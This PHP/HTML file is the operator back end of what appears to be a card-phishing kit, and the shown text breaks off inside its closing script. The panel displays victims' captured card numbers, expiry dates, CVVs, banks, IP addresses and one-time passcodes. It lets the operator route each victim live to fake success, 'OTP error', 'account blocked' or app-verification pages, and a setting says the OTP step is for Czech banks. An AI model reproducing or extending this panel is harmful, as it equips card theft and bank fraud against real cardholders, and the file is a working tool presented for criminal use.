<?php
// Start a session to manage admin authentication
session_start();
// Define admin credentials
// In a real application, these would be stored securely, not in the code
$admin_username = 'admin';
$admin_password = 'password123'; // You should use a strong hashed password in production
// Check if user is already logged in
$is_logged_in = isset($_SESSION['admin_logged_in']) && $_SESSION['admin_logged_in'] === true;
// Check if there's a message in the session that needs to be displayed
if (isset($_SESSION['success_message'])) {
$redirect_message = $_SESSION['success_message'];
unset($_SESSION['success_message']);
}
if (isset($_SESSION['error_message'])) {
$redirect_error = $_SESSION['error_message'];
unset($_SESSION['error_message']);
}
if (isset($_SESSION['otp_message'])) {
$otp_message = $_SESSION['otp_message'];
unset($_SESSION['otp_message']);
}
if (isset($_SESSION['otp_error'])) {
$otp_error = $_SESSION['otp_error'];
unset($_SESSION['otp_error']);
}
if (isset($_SESSION['save_message'])) {
$save_message = $_SESSION['save_message'];
unset($_SESSION['save_message']);
}
// Handle login attempt
if (isset($_POST['action']) && $_POST['action'] === 'login') {
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
if ($username === $admin_username && $password === $admin_password) {
$_SESSION['admin_logged_in'] = true;
$is_logged_in = true;
// Redirect to the same page to avoid form resubmission
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
} else {
$_SESSION['login_error'] = "Invalid username or password";
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
}
// Handle logout
if (isset($_GET['action']) && $_GET['action'] === 'logout') {
// Clear session
session_unset();
session_destroy();
// Redirect to login page
header('Location: control_panel.php');
exit;
}
// Configuration file path
$config_dir = 'config';
$redirect_config_file = $config_dir . '/redirect_settings.json';
$pending_cards_file = $config_dir . '/pending_cards.json';
// Default settings
$default_settings = [
'success_url' => 'success-page.html',
'failure_url' => 'failed.html',
'default_destination' => 'https://www.example.com',
'redirect_delay' => 2,
'enable_otp' => true // New setting to enable/disable OTP verification
];
// Initialize settings
$settings = $default_settings;
// Create config directory if it doesn't exist
if (!file_exists($config_dir) && !is_dir($config_dir)) {
mkdir($config_dir, 0755, true);
}
// Load existing settings if file exists
if (file_exists($redirect_config_file)) {
$config_content = file_get_contents($redirect_config_file);
$loaded_settings = json_decode($config_content, true);
if (is_array($loaded_settings)) {
$settings = array_merge($settings, $loaded_settings);
}
}
// Save settings
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'save_settings') {
// Get submitted settings
$settings['success_url'] = isset($_POST['success_url']) ? $_POST['success_url'] : $settings['success_url'];
$settings['failure_url'] = isset($_POST['failure_url']) ? $_POST['failure_url'] : $settings['failure_url'];
$settings['default_destination'] = isset($_POST['default_destination']) ? $_POST['default_destination'] : $settings['default_destination'];
$settings['redirect_delay'] = isset($_POST['redirect_delay']) ? (int)$_POST['redirect_delay'] : $settings['redirect_delay'];
$settings['enable_otp'] = isset($_POST['enable_otp']) ? true : false;
// Save settings to file
file_put_contents($redirect_config_file, json_encode($settings, JSON_PRETTY_PRINT));
$_SESSION['save_message'] = 'Settings saved successfully!';
// Redirect back to the same page to avoid form resubmission
header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=settings');
exit;
}
// Handle pending cards redirection
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'redirect_user') {
$session_id = isset($_POST['session_id']) ? $_POST['session_id'] : '';
$redirect_url = isset($_POST['redirect_url']) ? $_POST['redirect_url'] : '';
// Load pending cards
$pending_cards = [];
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$pending_cards = json_decode($pending_content, true) ?: [];
}
// Update the specific card with the redirect URL
if (isset($pending_cards[$session_id])) {
$pending_cards[$session_id]['redirect_url'] = $redirect_url;
$pending_cards[$session_id]['status'] = 'redirected';
$pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s');
$pending_cards[$session_id]['redirect_by'] = $admin_username;
// Save updated pending cards
file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
$_SESSION['success_message'] = "User with Session ID: $session_id has been redirected to: $redirect_url";
} else {
$_SESSION['error_message'] = "Session ID not found in pending cards";
}
// Redirect back to the same page to avoid form resubmission
header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=pending');
exit;
}
// Handle OTP approval/denial
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'handle_otp') {
$session_id = isset($_POST['session_id']) ? $_POST['session_id'] : '';
$otp_decision = isset($_POST['otp_decision']) ? $_POST['otp_decision'] : '';
$redirect_url = isset($_POST['redirect_url']) ? $_POST['redirect_url'] : '';
// Load pending cards
$pending_cards = [];
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$pending_cards = json_decode($pending_content, true) ?: [];
}
// Update the specific card with OTP decision
if (isset($pending_cards[$session_id])) {
if ($otp_decision === 'approve') {
$pending_cards[$session_id]['otp_status'] = 'approved';
$pending_cards[$session_id]['status'] = 'redirected';
$pending_cards[$session_id]['redirect_url'] = $redirect_url;
$pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s');
$pending_cards[$session_id]['redirect_by'] = $admin_username;
$_SESSION['otp_message'] = "OTP approved for Session ID: $session_id. User will be redirected to: $redirect_url";
} else {
$pending_cards[$session_id]['otp_status'] = 'denied';
$pending_cards[$session_id]['status'] = 'redirected';
$pending_cards[$session_id]['redirect_url'] = $settings['failure_url'];
$pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s');
$pending_cards[$session_id]['redirect_by'] = $admin_username;
$_SESSION['otp_message'] = "OTP denied for Session ID: $session_id. User will be redirected to failure page.";
}
// Save updated pending cards
file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
} else {
$_SESSION['otp_error'] = "Session ID not found in pending cards";
}
// Redirect back to the same page to avoid form resubmission
header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=otp');
exit;
}
// Handle OTP redirection decisions
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'handle_otp_redirect') {
$session_id = isset($_POST['session_id']) ? $_POST['session_id'] : '';
$otp_decision = isset($_POST['otp_decision']) ? $_POST['otp_decision'] : '';
$redirect_choice = isset($_POST['redirect_choice']) ? $_POST['redirect_choice'] : 'success';
// Load pending cards
$pending_cards = [];
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$pending_cards = json_decode($pending_content, true) ?: [];
}
// Update the specific card based on the decision
if (isset($pending_cards[$session_id])) {
$redirect_url = '';
if ($otp_decision === 'deny') {
// Always redirect to failure page on deny
$redirect_url = $settings['failure_url'];
$pending_cards[$session_id]['otp_status'] = 'denied';
$_SESSION['otp_message'] = "OTP denied for Session ID: $session_id. User will be redirected to failure page.";
} else {
// Handle different redirect choices
switch ($redirect_choice) {
case 'success':
$redirect_url = $settings['success_url'];
$pending_cards[$session_id]['otp_status'] = 'approved';
$_SESSION['otp_message'] = "OTP approved for Session ID: $session_id. User will be redirected to success page.";
break;
case 'error':
$error_type = isset($_POST['error_type']) ? $_POST['error_type'] : 'timeout';
$error_attempts = isset($_POST['error_attempts']) ? $_POST['error_attempts'] : '1';
$redirect_url = "otp-error.php?type=" . urlencode($error_type) . "&attempts=" . urlencode($error_attempts);
$pending_cards[$session_id]['otp_status'] = 'error';
$_SESSION['otp_message'] = "OTP redirected to error page with type: $error_type, attempts: $error_attempts";
break;
case 'app':
$redirect_url = "apk-verification.php";
$pending_cards[$session_id]['otp_status'] = 'app_verification';
$_SESSION['otp_message'] = "User redirected to app verification page.";
break;
case 'custom':
$redirect_url = isset($_POST['custom_url']) ? $_POST['custom_url'] : $settings['success_url'];
$pending_cards[$session_id]['otp_status'] = 'custom_redirect';
$_SESSION['otp_message'] = "OTP approved with custom redirection to: $redirect_url";
break;
default:
$redirect_url = $settings['success_url'];
$pending_cards[$session_id]['otp_status'] = 'approved';
$_SESSION['otp_message'] = "OTP approved for Session ID: $session_id. User will be redirected to success page.";
break;
}
}
// Update card status and redirection
$pending_cards[$session_id]['status'] = 'redirected';
$pending_cards[$session_id]['redirect_url'] = $redirect_url;
$pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s');
$pending_cards[$session_id]['redirect_by'] = $admin_username;
// Save updated pending cards
file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
} else {
$_SESSION['otp_error'] = "Session ID not found in pending cards";
}
// Redirect back to the same page to avoid form resubmission
header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=otp');
exit;
}
// Get all cards (completed and pending)
$all_cards = [];
$data_dir = 'data';
$json_file = $data_dir . '/cards.json';
if (file_exists($json_file)) {
$file_contents = file_get_contents($json_file);
if (!empty($file_contents)) {
$all_cards = json_decode($file_contents, true) ?: [];
}
}
// Get pending cards (waiting for redirection)
$pending_cards = [];
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$loaded_pending = json_decode($pending_content, true);
if (is_array($loaded_pending)) {
$pending_cards = $loaded_pending;
}
}
// Count statistics
$total_cards = count($all_cards);
$total_pending = count(array_filter($pending_cards, function($card) {
return isset($card['status']) && $card['status'] === 'pending';
}));
$total_redirected = count(array_filter($pending_cards, function($card) {
return isset($card['status']) && $card['status'] === 'redirected';
}));
// Additional count statistics for OTP status
$total_otp_pending = count(array_filter($pending_cards, function($card) {
return isset($card['status']) &&
($card['status'] === 'otp_verification' || $card['status'] === 'otp_submitted');
}));
$total_otp_submitted = count(array_filter($pending_cards, function($card) {
return isset($card['status']) && $card['status'] === 'otp_submitted';
}));
// Get recent cards (last 10)
$recent_cards = array_slice(array_reverse($all_cards), 0, 10);
// Function to mask a credit card number
function maskCardNumber($cardNumber) {
// Remove any non-numeric characters
$cardNumber = preg_replace('/\D/', '', $cardNumber);
// Get the length of the card number
$length = strlen($cardNumber);
// If card number is too short, return as is
if ($length <= 4) {
return $cardNumber;
}
// Keep first 6 and last 4 digits, mask the rest
$firstSix = substr($cardNumber, 0, 6);
$lastFour = substr($cardNumber, -4);
$masked = str_repeat('X', $length - 10);
// Format with spaces for readability
return $firstSix . $masked . $lastFour;
}
?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Card Control Panel</title>
<style>
body {
font-family: Arial, sans-serif;
line-height: 1.6;
margin: 0;
padding: 0;
background-color: #f5f5f5;
color: #333;
}
.container {
max-width: 1200px;
margin: 0 auto;
padding: 20px;
}
.login-container {
max-width: 400px;
margin: 100px auto;
background: #fff;
padding: 30px;
border-radius: 8px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
}
.panel-container {
background: #fff;
border-radius: 8px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
margin-bottom: 20px;
}
.panel-header {
background-color: #4a6da7;
color: white;
padding: 15px 20px;
border-top-left-radius: 8px;
border-top-right-radius: 8px;
display: flex;
justify-content: space-between;
align-items: center;
}
.panel-header h1 {
margin: 0;
font-size: 24px;
}
.panel-body {
padding: 20px;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 8px;
font-weight: bold;
}
input[type="text"],
input[type="password"],
input[type="number"],
input[type="url"],
input[type="checkbox"] {
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
font-size: 16px;
box-sizing: border-box;
}
input[type="text"],
input[type="password"],
input[type="number"],
input[type="url"] {
width: 100%;
}
button, .btn {
background-color: #4a6da7;
color: white;
border: none;
padding: 12px 20px;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
font-weight: bold;
text-decoration: none;
display: inline-block;
}
button:hover, .btn:hover {
background-color: #3a5a8f;
}
.logout-btn {
background-color: #f44336;
padding: 8px 16px;
font-size: 14px;
}
.logout-btn:hover {
background-color: #d32f2f;
}
.btn-success {
background-color: #4CAF50;
}
.btn-success:hover {
background-color: #3e8e41;
}
.btn-warning {
background-color: #ff9800;
}
.btn-warning:hover {
background-color: #e68a00;
}
.btn-danger {
background-color: #f44336;
}
.btn-danger:hover {
background-color: #d32f2f;
}
.alert {
padding: 12px 16px;
margin-bottom: 20px;
border-radius: 4px;
}
.alert-success {
background-color: #dff0d8;
color: #3c763d;
border: 1px solid #d6e9c6;
}
.alert-danger {
background-color: #f2dede;
color: #a94442;
border: 1px solid #ebccd1;
}
.stats-grid {
display: grid;
grid-template-columns: repeat(auto-fill, minmax(230px, 1fr));
gap: 20px;
margin-bottom: 30px;
}
.stat-card {
background-color: white;
border-radius: 8px;
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
padding: 20px;
text-align: center;
}
.stat-value {
font-size: 36px;
font-weight: bold;
margin: 10px 0;
color: #4a6da7;
}
.stat-label {
color: #777;
font-size: 14px;
text-transform: uppercase;
}
table {
width: 100%;
border-collapse: collapse;
}
th, td {
padding: 12px 15px;
text-align: left;
border-bottom: 1px solid #ddd;
}
th {
background-color: #f8f9fa;
font-weight: bold;
}
tr:hover {
background-color: #f5f5f5;
}
.card-details {
margin-bottom: 15px;
border-left: 4px solid #4a6da7;
padding: 10px 15px;
background-color: #f9f9f9;
}
.card-actions {
margin-top: 15px;
}
.tabs {
display: flex;
border-bottom: 1px solid #ddd;
margin-bottom: 20px;
}
.tab {
padding: 10px 20px;
cursor: pointer;
border-bottom: 2px solid transparent;
}
.tab.active {
border-bottom: 2px solid #4a6da7;
font-weight: bold;
color: #4a6da7;
}
.tab-content {
display: none;
}
.tab-content.active {
display: block;
}
.badge {
display: inline-block;
padding: 4px 8px;
border-radius: 50px;
font-size: 12px;
font-weight: bold;
text-transform: uppercase;
}
.badge-success {
background-color: #4CAF50;
color: white;
}
.badge-warning {
background-color: #ff9800;
color: white;
}
.badge-danger {
background-color: #f44336;
color: white;
}
.badge-info {
background-color: #2196F3;
color: white;
}
.modal {
display: none;
position: fixed;
z-index: 1000;
left: 0;
top: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.5);
}
.modal-content {
background-color: #fff;
margin: 10% auto;
padding: 20px;
border-radius: 8px;
width: 50%;
max-width: 500px;
}
.modal-header {
display: flex;
justify-content: space-between;
align-items: center;
border-bottom: 1px solid #ddd;
padding-bottom: 10px;
margin-bottom: 20px;
}
.modal-header h2 {
margin: 0;
}
.modal-footer {
border-top: 1px solid #ddd;
padding-top: 15px;
margin-top: 20px;
text-align: right;
}
.close {
color: #aaa;
font-size: 28px;
font-weight: bold;
cursor: pointer;
}
.close:hover {
color: #333;
}
.loader {
border: 4px solid #f3f3f3;
border-top: 4px solid #4a6da7;
border-radius: 50%;
width: 30px;
height: 30px;
animation: spin 1s linear infinite;
margin: 20px auto;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
.live-feed {
background-color: #f9f9f9;
border-radius: 4px;
padding: 15px;
height: 300px;
overflow-y: auto;
margin-bottom: 20px;
}
.live-feed-item {
padding: 10px;
border-bottom: 1px solid #eee;
}
.live-feed-item:last-child {
border-bottom: none;
}
.live-feed-time {
font-size: 12px;
color: #777;
}
.refresh-btn {
background-color: transparent;
color: #4a6da7;
border: 1px solid #4a6da7;
padding: 8px 16px;
margin-bottom: 15px;
}
.refresh-btn:hover {
background-color: #f0f5ff;
}
.flex-row {
display: flex;
flex-wrap: wrap;
gap: 15px;
margin-bottom: 15px;
}
.card-info {
flex: 1;
min-width: 300px;
}
.card-redirect {
flex: 1;
min-width: 300px;
}
small {
display: block;
margin-top: 5px;
color: #777;
font-size: 0.8em;
}
.radio-options {
margin-top: 10px;
}
.radio-option {
margin-bottom: 8px;
}
.radio-option input[type="radio"] {
margin-right: 5px;
}
select {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
font-size: 16px;
box-sizing: border-box;
}
</style>
</head>
<body>
<div class="container">
<?php if (!$is_logged_in): ?>
<!-- Login Form -->
<div class="login-container">
<h2>Card Control Panel Login</h2>
<?php if (isset($_SESSION['login_error'])): ?>
<div class="alert alert-danger">
<?php echo $_SESSION['login_error']; unset($_SESSION['login_error']); ?>
</div>
<?php endif; ?>
<form method="post" action="">
<div class="form-group">
<label for="username">Username</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
</div>
<input type="hidden" name="action" value="login">
<button type="submit">Login</button>
</form>
</div>
<?php else: ?>
<!-- Admin Panel -->
<div class="panel-container">
<div class="panel-header">
<h1>Card Control Panel</h1>
<a href="?action=logout"><button class="logout-btn">Logout</button></a>
</div>
<div class="panel-body">
<!-- Stats Overview -->
<div class="stats-grid">
<div class="stat-card">
<div class="stat-value"><?php echo $total_cards; ?></div>
<div class="stat-label">Total Cards</div>
</div>
<div class="stat-card">
<div class="stat-value"><?php echo $total_pending; ?></div>
<div class="stat-label">Pending Redirects</div>
</div>
<div class="stat-card">
<div class="stat-value"><?php echo $total_redirected; ?></div>
<div class="stat-label">Redirected Users</div>
</div>
<div class="stat-card">
<div class="stat-value"><?php echo $total_otp_pending; ?></div>
<div class="stat-label">Pending OTP</div>
</div>
<div class="stat-card">
<div class="stat-value"><?php echo $total_otp_submitted; ?></div>
<div class="stat-label">OTP Submitted</div>
</div>
</div>
<div class="tabs">
<div class="tab active" data-tab="pending">Pending Redirects</div>
<div class="tab" data-tab="otp">OTP Verification</div>
<div class="tab" data-tab="recent">Recent Cards</div>
<div class="tab" data-tab="settings">Redirect Settings</div>
</div>
<!-- Pending Redirects Tab -->
<div class="tab-content active" id="pending-tab">
<h2>Pending Redirects</h2>
<?php if (isset($redirect_message)): ?>
<div class="alert alert-success">
<?php echo $redirect_message; ?>
</div>
<?php endif; ?>
<?php if (isset($redirect_error)): ?>
<div class="alert alert-danger">
<?php echo $redirect_error; ?>
</div>
<?php endif; ?>
<button id="refreshPendingBtn" class="refresh-btn">
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
<path d="M1 4v6h6"/><path d="M23 20v-6h-6"/>
<path d="M20.49 9A9 9 0 0 0 5.64 5.64L1 10m22 4l-4.64 4.36A9 9 0 0 1 3.51 15"/>
</svg>
Refresh List
</button>
<?php if (empty($pending_cards) || count(array_filter($pending_cards, function($card) { return isset($card['status']) && $card['status'] === 'pending'; })) === 0): ?>
<p>No pending cards waiting for redirection.</p>
<?php else: ?>
<div id="pendingCardsList">
<?php foreach ($pending_cards as $session_id => $card): ?>
<?php if (isset($card['status']) && $card['status'] === 'pending'): ?>
<div class="card-details">
<div class="flex-row">
<div class="card-info">
<h3>Card Information</h3>
<p><strong>Session ID:</strong> <?php echo htmlspecialchars($session_id); ?></p>
<p><strong>Card Number:</strong> <?php echo htmlspecialchars(maskCardNumber($card['card_number'])); ?></p>
<p><strong>Expiry:</strong> <?php echo htmlspecialchars($card['expiry_date']); ?></p>
<p><strong>CVV:</strong> <?php echo htmlspecialchars($card['cvv']); ?></p>
<p><strong>Save Card:</strong> <?php echo isset($card['save_card']) ? htmlspecialchars($card['save_card']) : 'No'; ?></p>
<p><strong>Card Type:</strong> <?php echo isset($card['card_type']) ? htmlspecialchars($card['card_type']) : 'Unknown'; ?></p>
<p><strong>Bank:</strong> <?php echo isset($card['bank_name']) ? htmlspecialchars($card['bank_name']) : 'Unknown'; ?></p>
<p><strong>IP Address:</strong> <?php echo htmlspecialchars($card['ip']); ?></p>
<p><strong>Time:</strong> <?php echo htmlspecialchars($card['timestamp']); ?></p>
</div>
<div class="card-redirect">
<h3>Redirect User</h3>
<form method="post" action="">
<div class="form-group">
<label for="redirect_url_<?php echo $session_id; ?>">Redirect URL</label>
<input type="url" id="redirect_url_<?php echo $session_id; ?>" name="redirect_url" value="<?php echo htmlspecialchars($settings['success_url']); ?>" required>
</div>
<input type="hidden" name="session_id" value="<?php echo htmlspecialchars($session_id); ?>">
<input type="hidden" name="action" value="redirect_user">
<div class="card-actions">
<button type="submit" class="btn-success">Redirect User</button>
<button type="button" class="btn-danger" onclick="setRedirectUrl('<?php echo $session_id; ?>', '<?php echo htmlspecialchars($settings['failure_url']); ?>')">Decline</button>
</div>
</form>
</div>
</div>
</div>
<?php endif; ?>
<?php endforeach; ?>
</div>
<?php endif; ?>
</div>
<!-- OTP Verification Tab with Enhanced Redirection Options -->
<div class="tab-content" id="otp-tab">
<h2>OTP Verification Requests</h2>
<?php if (isset($otp_message)): ?>
<div class="alert alert-success">
<?php echo $otp_message; ?>
</div>
<?php endif; ?>
<?php if (isset($otp_error)): ?>
<div class="alert alert-danger">
<?php echo $otp_error; ?>
</div>
<?php endif; ?>
<button id="refreshOtpBtn" class="refresh-btn">
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
<path d="M1 4v6h6"/><path d="M23 20v-6h-6"/>
<path d="M20.49 9A9 9 0 0 0 5.64 5.64L1 10m22 4l-4.64 4.36A9 9 0 0 1 3.51 15"/>
</svg>
Refresh OTP List
</button>
<?php if (empty($pending_cards) || count(array_filter($pending_cards, function($card) {
return isset($card['status']) && ($card['status'] === 'otp_verification' || $card['status'] === 'otp_submitted');
})) === 0): ?>
<p>No pending OTP verification requests.</p>
<?php else: ?>
<div id="otpRequestsList">
<?php foreach ($pending_cards as $session_id => $card): ?>
<?php if (isset($card['status']) && ($card['status'] === 'otp_verification' || $card['status'] === 'otp_submitted')): ?>
<div class="card-details">
<div class="flex-row">
<div class="card-info">
<h3>Card Information</h3>
<p><strong>Session ID:</strong> <?php echo htmlspecialchars($session_id); ?></p>
<p><strong>Card Number:</strong> <?php echo htmlspecialchars(maskCardNumber($card['card_number'])); ?></p>
<p><strong>Expiry:</strong> <?php echo htmlspecialchars($card['expiry_date']); ?></p>
<p><strong>CVV:</strong> <?php echo htmlspecialchars($card['cvv']); ?></p>
<p><strong>Save Card:</strong> <?php echo isset($card['save_card']) ? htmlspecialchars($card['save_card']) : 'No'; ?></p>
<p><strong>Card Type:</strong> <?php echo isset($card['card_type']) ? htmlspecialchars($card['card_type']) : 'Unknown'; ?></p>
<p><strong>Bank:</strong> <?php echo isset($card['bank_name']) ? htmlspecialchars($card['bank_name']) : 'Unknown'; ?></p>
<p><strong>IP Address:</strong> <?php echo htmlspecialchars($card['ip']); ?></p>
<p><strong>OTP Status:</strong>
<span class="badge badge-<?php echo ($card['status'] === 'otp_submitted') ? 'info' : 'warning'; ?>">
<?php echo ($card['status'] === 'otp_submitted') ? 'OTP Submitted' : 'Waiting for OTP'; ?>
</span>
</p>
<?php if ($card['status'] === 'otp_submitted'): ?>
<p><strong>OTP Code:</strong> <span class="badge badge-success"><?php echo htmlspecialchars($card['otp']); ?></span></p>
<p><strong>OTP Time:</strong> <?php echo htmlspecialchars($card['otp_time']); ?></p>
<?php endif; ?>
<p><strong>Time:</strong> <?php echo htmlspecialchars($card['timestamp']); ?></p>
</div>
<div class="card-redirect">
<h3>Redirection Options</h3>
<form method="post" action="">
<div class="form-group">
<label>Choose where to redirect the user:</label>
<div class="radio-options">
<div class="radio-option">
<input type="radio" id="redirect_success_<?php echo $session_id; ?>" name="redirect_choice" value="success" checked>
<label for="redirect_success_<?php echo $session_id; ?>">Success Page</label>
</div>
<div class="radio-option">
<input type="radio" id="redirect_error_<?php echo $session_id; ?>" name="redirect_choice" value="error">
<label for="redirect_error_<?php echo $session_id; ?>">OTP Error Page</label>
</div>
<div class="radio-option">
<input type="radio" id="redirect_app_<?php echo $session_id; ?>" name="redirect_choice" value="app">
<label for="redirect_app_<?php echo $session_id; ?>">App Verification</label>
</div>
<div class="radio-option">
<input type="radio" id="redirect_custom_<?php echo $session_id; ?>" name="redirect_choice" value="custom">
<label for="redirect_custom_<?php echo $session_id; ?>">Custom URL</label>
</div>
</div>
</div>
<div class="form-group" id="custom_url_group_<?php echo $session_id; ?>">
<label for="custom_url_<?php echo $session_id; ?>">Custom URL:</label>
<input type="url" id="custom_url_<?php echo $session_id; ?>" name="custom_url" value="http://google.com">
</div>
<div class="form-group" id="error_options_<?php echo $session_id; ?>" style="display: none;">
<label for="error_type_<?php echo $session_id; ?>">Error Type:</label>
<select id="error_type_<?php echo $session_id; ?>" name="error_type">
<option value="timeout">Timeout</option>
<option value="invalid">Invalid Code</option>
<option value="blocked">Account Blocked</option>
<option value="network">Network Error</option>
<option value="technical">Technical Error</option>
<option value="session">Session Expired</option>
</select>
<div class="form-group">
<label for="error_attempts_<?php echo $session_id; ?>">Error Attempts:</label>
<select id="error_attempts_<?php echo $session_id; ?>" name="error_attempts">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
</select>
</div>
</div>
<input type="hidden" name="session_id" value="<?php echo htmlspecialchars($session_id); ?>">
<input type="hidden" name="action" value="handle_otp_redirect">
<div class="card-actions">
<button type="submit" name="otp_decision" value="redirect" class="btn-success">Redirect User</button>
<button type="submit" name="otp_decision" value="deny" class="btn-danger">Deny (Failure Page)</button>
</div>
</form>
</div>
</div>
</div>
<?php endif; ?>
<?php endforeach; ?>
</div>
<?php endif; ?>
</div>
<!-- Recent Cards Tab -->
<div class="tab-content" id="recent-tab">
<h2>Recent Card Submissions</h2>
<?php if (empty($recent_cards)): ?>
<p>No recent card submissions found.</p>
<?php else: ?>
<table>
<thead>
<tr>
<th>Date/Time</th>
<th>Card Number</th>
<th>Expiry</th>
<th>CVV</th>
<th>Save Card</th>
<th>Type</th>
<th>Bank</th>
<th>IP Address</th>
</tr>
</thead>
<tbody>
<?php foreach ($recent_cards as $card): ?>
<tr>
<td><?php echo isset($card['timestamp']) ? htmlspecialchars($card['timestamp']) : 'N/A'; ?></td>
<td><?php echo isset($card['card_number']) ? htmlspecialchars(maskCardNumber($card['card_number'])) : 'N/A'; ?></td>
<td><?php echo isset($card['expiry_date']) ? htmlspecialchars($card['expiry_date']) : 'N/A'; ?></td>
<td><?php echo isset($card['cvv']) ? htmlspecialchars($card['cvv']) : 'N/A'; ?></td>
<td><?php echo isset($card['save_card']) ? htmlspecialchars($card['save_card']) : 'N/A'; ?></td>
<td><?php echo isset($card['card_type']) ? htmlspecialchars($card['card_type']) : 'N/A'; ?></td>
<td><?php echo isset($card['bank_name']) ? htmlspecialchars($card['bank_name']) : 'N/A'; ?></td>
<td><?php echo isset($card['ip']) ? htmlspecialchars($card['ip']) : 'N/A'; ?></td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
<!-- Settings Tab -->
<div class="tab-content" id="settings-tab">
<h2>Redirect Settings</h2>
<?php if (isset($save_message)): ?>
<div class="alert alert-success">
<?php echo $save_message; ?>
</div>
<?php endif; ?>
<form method="post" action="">
<div class="form-group">
<label for="success_url">Success Redirect URL</label>
<input type="text" id="success_url" name="success_url" value="<?php echo htmlspecialchars($settings['success_url']); ?>" required>
<small>Where to redirect users after successful verification</small>
</div>
<div class="form-group">
<label for="failure_url">Failure Redirect URL</label>
<input type="text" id="failure_url" name="failure_url" value="<?php echo htmlspecialchars($settings['failure_url']); ?>" required>
<small>Where to redirect users after failed verification</small>
</div>
<div class="form-group">
<label for="default_destination">Default Destination URL</label>
<input type="url" id="default_destination" name="default_destination" value="<?php echo htmlspecialchars($settings['default_destination']); ?>" required>
<small>Fallback URL if no specific redirect is defined</small>
</div>
<div class="form-group">
<label for="redirect_delay">Redirect Delay (seconds)</label>
<input type="number" id="redirect_delay" name="redirect_delay" value="<?php echo (int)$settings['redirect_delay']; ?>" min="0" max="10" required>
<small>How long to wait before redirecting users (0-10 seconds)</small>
</div>
<div class="form-group">
<label for="enable_otp">
<input type="checkbox" id="enable_otp" name="enable_otp" <?php echo isset($settings['enable_otp']) && $settings['enable_otp'] ? 'checked' : ''; ?>>
Enable OTP Verification
</label>
<small>Require OTP verification for Czech banks</small>
</div>
<input type="hidden" name="action" value="save_settings">
<button type="submit">Save Settings</button>
</form>
</div>
</div>
</div>
<?php endif; ?>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
// Tab navigation
const tabs = document.querySelectorAll('.tab');
// Tab persistence
const currentTab = new URLSearchParams(window.location.search).get('tab');
if (currentTab) {
// Find the tab element with the corresponding data-tab attribute
const tabElement = document.querySelector(`.tab[data-tab="${currentTab}"]`);
if (tabElement) {
// Remove active class from all tabs
document.querySelectorAll('.tab').forEach(t => t.classList.remove('active'));
// Add active class to the selected tab
tabElement.classList.add('active');
// Hide all tab content
document.querySelectorAll('.tab-content').forEach(content => {
content.classList.remove('active');
});
// Show the relevant tab content
document.getElementById(`${currentTab}-tab`).classList.add('active');
}
}
tabs.forEach(tab => {
tab.addEventListener('click', function() {
// Remove active class from all tabs
tabs.forEach(t => t.classList.remove('active'));
// Add active class to clicked tab
this.classList.add('active');
// Get the tab content id
const tabName = this.dataset.tab;
// Hide all tab content
document.querySelectorAll('.tab-content').forEach(content => {
content.classList.remove('active');
});
// Show the relevant tab content
document.getElementById(`${tabName}-tab`).classList.add('active');
// Update URL without refreshing page
const url = new URL(window.location);
url.searchParams.set('tab', tabName);
window.history.pushState({}, '', url);
});
});
// Function to set redirect URL in form field
window.setRedirectUrl = function(sessionId, url) {
const redirectUrlField = document.getElementById(`redirect_url_${sessionId}`);
if (redirectUrlField) {
redirectUrlField.value = url;
}
};
// Refresh pending cards list
document.getElementById('refreshPendingBtn').addEventListener('click', function() {
location.reload();
});
// Refresh OTP list
document.getElementById('refreshOtpBtn').addEventListener('click', function() {
location.reload();
});
// Auto-refresh pending cards list every 30 seconds
setInterval(function() {
if (document.getElementById('pending-tab').classList.contains('active') ||
document.getElementById('otp-tab').classList.contains('active')) {
location.reload();
}
}, 30000);
// Add event listeners for the custom URL and error options toggles
const pendingCards = document.querySelectorAll('.card-details');
pendingCards.forEach(card => {
